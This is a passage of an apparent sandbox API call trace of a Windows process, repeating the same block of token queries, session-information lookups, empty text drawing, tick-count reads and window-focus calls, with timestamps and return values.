DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3f8) returned 1 [0071.975] GetTokenInformation (in: TokenHandle=0x3f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.975] GetLastError () returned 0x7a [0071.975] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.975] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.976] WTSFreeMemory (pMemory=0x0) [0071.976] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.976] TextOutW (hdc=0x0, x=1154, y=2649, lpString="", c=0) returned 1 [0071.976] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.976] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.976] GetTickCount () returned 0x1f160 [0071.978] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.978] SetForegroundWindow (hWnd=0x0) returned 0 [0071.978] BringWindowToTop (hWnd=0x0) returned 0 [0071.978] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3fc) returned 1 [0071.978] GetTokenInformation (in: TokenHandle=0x3fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.978] GetLastError () returned 0x7a [0071.978] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.978] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.979] WTSFreeMemory (pMemory=0x0) [0071.979] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.979] TextOutW (hdc=0x0, x=1164, y=2674, lpString="", c=0) returned 1 [0071.979] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.979] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.979] GetTickCount () returned 0x1f160 [0071.980] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.980] SetForegroundWindow (hWnd=0x0) returned 0 [0071.980] BringWindowToTop (hWnd=0x0) returned 0 [0071.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x404) returned 1 [0071.980] GetTokenInformation (in: TokenHandle=0x404, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.980] GetLastError () returned 0x7a [0071.980] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.980] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.981] WTSFreeMemory (pMemory=0x0) [0071.981] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.981] TextOutW (hdc=0x0, x=1174, y=2699, lpString="", c=0) returned 1 [0071.981] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.981] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.981] GetTickCount () returned 0x1f160 [0071.985] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.985] SetForegroundWindow (hWnd=0x0) returned 0 [0071.985] BringWindowToTop (hWnd=0x0) returned 0 [0071.985] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x408) returned 1 [0071.985] GetTokenInformation (in: TokenHandle=0x408, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.985] GetLastError () returned 0x7a [0071.985] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.985] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.986] WTSFreeMemory (pMemory=0x0) [0071.986] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.986] TextOutW (hdc=0x0, x=1184, y=2724, lpString="", c=0) returned 1 [0071.986] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.986] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.986] GetTickCount () returned 0x1f160 [0071.987] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.991] SetForegroundWindow (hWnd=0x0) returned 0 [0071.991] BringWindowToTop (hWnd=0x0) returned 0 [0071.991] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x40c) returned 1 [0071.991] GetTokenInformation (in: TokenHandle=0x40c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.991] GetLastError () returned 0x7a [0071.991] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.991] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.991] WTSFreeMemory (pMemory=0x0) [0071.991] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.992] TextOutW (hdc=0x0, x=1194, y=2749, lpString="", c=0) returned 1 [0071.992] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.992] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.992] GetTickCount () returned 0x1f16f [0071.993] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.994] SetForegroundWindow (hWnd=0x0) returned 0 [0071.994] BringWindowToTop (hWnd=0x0) returned 0 [0071.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x410) returned 1 [0071.994] GetTokenInformation (in: TokenHandle=0x410, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.994] GetLastError () returned 0x7a [0071.994] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.994] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.994] WTSFreeMemory (pMemory=0x0) [0071.994] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.994] TextOutW (hdc=0x0, x=1204, y=2774, lpString="", c=0) returned 1 [0071.994] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.994] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.994] GetTickCount () returned 0x1f16f [0071.995] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.995] SetForegroundWindow (hWnd=0x0) returned 0 [0071.995] BringWindowToTop (hWnd=0x0) returned 0 [0071.995] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x414) returned 1 [0071.995] GetTokenInformation (in: TokenHandle=0x414, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.995] GetLastError () returned 0x7a [0071.995] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.995] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.996] WTSFreeMemory (pMemory=0x0) [0071.996] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.996] TextOutW (hdc=0x0, x=1214, y=2799, lpString="", c=0) returned 1 [0071.996] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.996] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.996] GetTickCount () returned 0x1f16f [0071.998] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.998] SetForegroundWindow (hWnd=0x0) returned 0 [0071.998] BringWindowToTop (hWnd=0x0) returned 0 [0071.998] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x418) returned 1 [0071.998] GetTokenInformation (in: TokenHandle=0x418, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.998] GetLastError () returned 0x7a [0071.998] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.998] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.999] WTSFreeMemory (pMemory=0x0) [0071.999] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.999] TextOutW (hdc=0x0, x=1224, y=2824, lpString="", c=0) returned 1 [0071.999] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.999] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.999] GetTickCount () returned 0x1f16f [0071.999] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.999] SetForegroundWindow (hWnd=0x0) returned 0 [0071.999] BringWindowToTop (hWnd=0x0) returned 0 [0072.000] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x41c) returned 1 [0072.000] GetTokenInformation (in: TokenHandle=0x41c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.000] GetLastError () returned 0x7a [0072.000] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.000] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.000] WTSFreeMemory (pMemory=0x0) [0072.000] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.000] TextOutW (hdc=0x0, x=1234, y=2849, lpString="", c=0) returned 1 [0072.000] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.000] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.000] GetTickCount () returned 0x1f16f [0072.002] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.002] SetForegroundWindow (hWnd=0x0) returned 0 [0072.002] BringWindowToTop (hWnd=0x0) returned 0 [0072.002] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x420) returned 1 [0072.002] GetTokenInformation (in: TokenHandle=0x420, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.002] GetLastError () returned 0x7a [0072.002] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.002] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.002] WTSFreeMemory (pMemory=0x0) [0072.002] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.003] TextOutW (hdc=0x0, x=1244, y=2874, lpString="", c=0) returned 1 [0072.003] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.003] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.003] GetTickCount () returned 0x1f16f [0072.004] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.004] SetForegroundWindow (hWnd=0x0) returned 0 [0072.004] BringWindowToTop (hWnd=0x0) returned 0 [0072.004] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x424) returned 1 [0072.004] GetTokenInformation (in: TokenHandle=0x424, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.004] GetLastError () returned 0x7a [0072.004] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.004] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.005] WTSFreeMemory (pMemory=0x0) [0072.005] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.005] TextOutW (hdc=0x0, x=1254, y=2899, lpString="", c=0) returned 1 [0072.005] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.005] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.005] GetTickCount () returned 0x1f17f [0072.007] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.007] SetForegroundWindow (hWnd=0x0) returned 0 [0072.007] BringWindowToTop (hWnd=0x0) returned 0 [0072.007] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x428) returned 1 [0072.007] GetTokenInformation (in: TokenHandle=0x428, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.007] GetLastError () returned 0x7a [0072.007] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.007] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.008] WTSFreeMemory (pMemory=0x0) [0072.008] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.008] TextOutW (hdc=0x0, x=1264, y=2924, lpString="", c=0) returned 1 [0072.008] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.008] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.008] GetTickCount () returned 0x1f17f [0072.009] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.009] SetForegroundWindow (hWnd=0x0) returned 0 [0072.009] BringWindowToTop (hWnd=0x0) returned 0 [0072.009] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x42c) returned 1 [0072.009] GetTokenInformation (in: TokenHandle=0x42c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.010] GetLastError () returned 0x7a [0072.010] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.010] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.010] WTSFreeMemory (pMemory=0x0) [0072.010] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.010] TextOutW (hdc=0x0, x=1274, y=2949, lpString="", c=0) returned 1 [0072.010] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.010] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.010] GetTickCount () returned 0x1f17f [0072.013] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.013] SetForegroundWindow (hWnd=0x0) returned 0 [0072.013] BringWindowToTop (hWnd=0x0) returned 0 [0072.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x430) returned 1 [0072.013] GetTokenInformation (in: TokenHandle=0x430, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.013] GetLastError () returned 0x7a [0072.013] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.013] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.014] WTSFreeMemory (pMemory=0x0) [0072.014] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.014] TextOutW (hdc=0x0, x=1284, y=2974, lpString="", c=0) returned 1 [0072.014] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.014] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.014] GetTickCount () returned 0x1f17f [0072.015] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.015] SetForegroundWindow (hWnd=0x0) returned 0 [0072.015] BringWindowToTop (hWnd=0x0) returned 0 [0072.015] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x434) returned 1 [0072.016] GetTokenInformation (in: TokenHandle=0x434, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.016] GetLastError () returned 0x7a [0072.016] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.016] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.016] WTSFreeMemory (pMemory=0x0) [0072.016] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.016] TextOutW (hdc=0x0, x=1294, y=2999, lpString="", c=0) returned 1 [0072.016] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.017] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.017] GetTickCount () returned 0x1f17f [0072.024] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.024] SetForegroundWindow (hWnd=0x0) returned 0 [0072.024] BringWindowToTop (hWnd=0x0) returned 0 [0072.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x438) returned 1 [0072.025] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.025] GetLastError () returned 0x7a [0072.025] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.025] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.025] WTSFreeMemory (pMemory=0x0) [0072.025] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.025] TextOutW (hdc=0x0, x=1304, y=3024, lpString="", c=0) returned 1 [0072.025] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.026] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.026] GetTickCount () returned 0x1f18f [0072.027] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.027] SetForegroundWindow (hWnd=0x0) returned 0 [0072.027] BringWindowToTop (hWnd=0x0) returned 0 [0072.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x43c) returned 1 [0072.027] GetTokenInformation (in: TokenHandle=0x43c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.027] GetLastError () returned 0x7a [0072.027] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.027] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.028] WTSFreeMemory (pMemory=0x0) [0072.028] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.028] TextOutW (hdc=0x0, x=1314, y=3049, lpString="", c=0) returned 1 [0072.028] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.028] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.028] GetTickCount () returned 0x1f18f [0072.030] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.030] SetForegroundWindow (hWnd=0x0) returned 0 [0072.031] BringWindowToTop (hWnd=0x0) returned 0 [0072.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x440) returned 1 [0072.031] GetTokenInformation (in: TokenHandle=0x440, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.031] GetLastError () returned 0x7a [0072.031] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.031] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.031] WTSFreeMemory (pMemory=0x0) [0072.031] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.032] TextOutW (hdc=0x0, x=1324, y=3074, lpString="", c=0) returned 1 [0072.032] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.032] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.032] GetTickCount () returned 0x1f18f [0072.033] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.033] SetForegroundWindow (hWnd=0x0) returned 0 [0072.033] BringWindowToTop (hWnd=0x0) returned 0 [0072.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x444) returned 1 [0072.033] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.033] GetLastError () returned 0x7a [0072.033] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.033] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.034] WTSFreeMemory (pMemory=0x0) [0072.034] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.034] TextOutW (hdc=0x0, x=1334, y=3099, lpString="", c=0) returned 1 [0072.034] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.034] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.034] GetTickCount () returned 0x1f18f [0072.037] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.037] SetForegroundWindow (hWnd=0x0) returned 0 [0072.037] BringWindowToTop (hWnd=0x0) returned 0 [0072.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x448) returned 1 [0072.037] GetTokenInformation (in: TokenHandle=0x448, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.037] GetLastError () returned 0x7a [0072.037] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.037] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.038] WTSFreeMemory (pMemory=0x0) [0072.038] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.038] TextOutW (hdc=0x0, x=1344, y=3124, lpString="", c=0) returned 1 [0072.038] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.038] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.038] GetTickCount () returned 0x1f19e [0072.041] 